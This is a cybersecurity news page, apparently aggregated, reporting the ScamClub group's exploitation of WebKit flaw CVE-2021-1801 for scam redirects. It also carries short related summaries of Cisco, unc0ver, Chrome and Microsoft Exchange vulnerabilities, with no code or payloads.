Malvertising Group Harnesses WebKit 0-Day to Redirect Users to Scam Sites

February 17, 2021

A malvertising collective known as “ScamClub” has exploited a zero-day vulnerability in WebKit-based browsers to inject malicious payloads that redirect users to fraudulent gift card scam websites. The attacks, first identified by the advertising security firm Confiant in late June 2020, took advantage of a bug (CVE-2021–1801) that allowed malicious actors to circumvent the iframe sandboxing policy in the browser engine used by Safari and Google Chrome on iOS, enabling them to execute harmful code. This technique specifically targeted the way WebKit manages JavaScript event listeners, allowing attackers to escape the sandbox of an ad’s inline frame even with the “allow-top-navigation-by-user-activation” attribute in place, which typically prevents redirection unless an event occurs within the iframe. To validate this approach, researchers created a simple HTML file featuring a cross-origin sandboxed iframe, along with an external button…

Malvertisers Exploit WebKit 0-Day to Redirect Users to Fraudulent Schemes

On February 17, 2021, security researchers revealed a significant cybersecurity threat posed by a malvertising group dubbed “ScamClub.” This group has taken advantage of a zero-day vulnerability within WebKit-based browsers, enabling them to inject malicious payloads that redirect unsuspecting users to scam websites, particularly involving fraudulent gift card schemes.

The vulnerability, identified as CVE-2021–1801, was first detected by the ad security firm Confiant in late June 2020. This critical flaw allows attackers to circumvent the iframe sandboxing policy inherent in browsers like Safari and Google Chrome for iOS, thus facilitating the execution of malicious code. By exploiting weaknesses in how WebKit manages JavaScript event listeners, the attackers were able to escape the confinement typically enforced on ad inline frames. This occurred despite the capability provided by the “allow-top-navigation-by-user-activation” attribute, which is designed to restrict redirection outside of an iframe unless triggered by a user click.

To explore this vulnerability further, researchers constructed a straightforward HTML file that included a cross-origin sandboxed iframe alongside a button positioned outside the iframe. Their investigation underscored how the manipulation of event listeners allowed attackers to perform seemingly unauthorized actions, effectively bypassing established security barriers.

The targets of these fraudulent schemes are primarily users of WebKit browsers, which have a significant user base in the United States. The ease with which attackers can exploit such vulnerabilities highlights the pressing need for heightened cybersecurity awareness among users and businesses alike. As more users interact with digital advertisements, the risks of falling victim to such tactics increase.

In the context of the MITRE ATT&CK framework, this attack aligns with various adversary tactics and techniques. Initial access was achieved through the exploitation of the WebKit vulnerability, enabling attackers to inject their malicious content into legitimate advertising networks. The technique utilized not only facilitated redirection to scam sites but also underscores the importance of understanding and potentially mitigating aspects of persistence and privilege escalation as attackers refine their methods.

For business owners, the implications of this incident are considerable. As digital advertising becomes a dominant means of outreach, understanding the vulnerabilities in web technologies is essential for safeguarding against such threats. Organizations must remain vigilant, continually reassessing their cybersecurity measures in light of new vulnerabilities and evolving attack strategies.

The emergence of threats like those posed by ScamClub should serve as a critical reminder of the importance of vigilance in online interactions. As attackers continue to exploit weaknesses in widely used technologies, collaborative efforts between businesses, security firms, and technology developers are crucial to enhance defenses and better protect users from the growing array of cyber threats.

Source link

Related Posts

Cisco Issues Security Updates for Critical Vulnerabilities in Its Products

February 26, 2021

Cisco has released a critical security patch for a severe vulnerability in its Application Centric Infrastructure (ACI) Multi-Site Orchestrator (MSO). This flaw potentially enables unauthenticated remote attackers to bypass authentication on compromised devices. According to a recent advisory from the company, “An attacker could exploit this vulnerability by sending a crafted request to the affected API.” A successful exploit could allow the attacker to obtain a token with administrator-level privileges, enabling authentication to the affected MSO and Cisco Application Policy Infrastructure Controller (APIC) devices. Identified as CVE-2021-1388, this vulnerability scores a 10 (out of 10) on the CVSS vulnerability scale and arises from improper token validation in an API endpoint of the Cisco ACI MSO installed on the Application Services Engine. It impacts ACI MSO versions running on the 3.0 software release. The ACI Multi-Site Orchestrator enables customers to monitor and manage their network infrastructure effectively.

Updated ‘unc0ver’ Tool Now Jailbreaks All iPhone Models Running iOS 11.0 – 14.3

March 2, 2021

The popular jailbreaking tool “unc0ver” has received an update that allows it to jailbreak a wide range of iPhone models running iOS versions from 11.0 to 14.3. This update, known as unc0ver v6.0.0, leverages a kernel vulnerability, identified as CVE-2021-1782, which Apple acknowledged was actively exploited as of January. Lead developer Pwn20wnd announced the release on Sunday, emphasizing that the tool can now unlock devices across various iOS versions, including 12.4.9-12.5.1, 13.5.1-13.7, and 14.0-14.3. The vulnerability allows malicious apps to escalate their privileges due to a race condition in the kernel. According to Pwn20wnd, “We wrote our own exploit based on CVE-2021-1782 for #unc0ver to achieve optimal exploit speed and stability.” Apple has since addressed this flaw in its updates for iOS and iPadOS 14.

Urgent: New Chrome 0-Day Vulnerability Under Active Exploitation – Update Your Browser Immediately!

On March 3, 2021, just a month after addressing an actively exploited zero-day flaw, Google has released updates for another critical vulnerability in Chrome, which is reportedly being targeted by attackers. The latest version, Chrome 89.0.4389.72, available for Windows, Mac, and Linux, includes a total of 47 security enhancements. The most severe issue addresses an “object lifecycle problem in audio,” tracked as CVE-2021-21166. This vulnerability was among two reported by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. A separate audio-related object lifecycle flaw was reported to Google on February 4, coinciding with the launch of Chrome 88. Though details are limited, it’s unclear whether the two issues are interconnected. Google has confirmed the existence of exploits in the wild but hasn’t provided further specifics. Users are urged to update their browsers without delay.

URGENT: Four Actively Exploited 0-Day Vulnerabilities Found in Microsoft Exchange Server

March 3, 2021

Microsoft has issued emergency patches for four previously undisclosed security vulnerabilities in Exchange Server that are currently being exploited by a new state-sponsored threat actor from China, aimed at data theft. The Microsoft Threat Intelligence Center (MSTIC) describes these attacks as “limited and targeted,” revealing that the adversary exploited these vulnerabilities to gain access to on-premises Exchange servers, allowing them to infiltrate email accounts and install malware for prolonged access to the victim’s environment. Microsoft confidently attributes this campaign to a group known as HAFNIUM, a sophisticated state-sponsored hacker collective based in China, while also suggesting the potential involvement of other groups. In discussing HAFNIUM’s tactics, techniques, and procedures (TTPs), Microsoft highlights the group’s high level of skill and sophistication.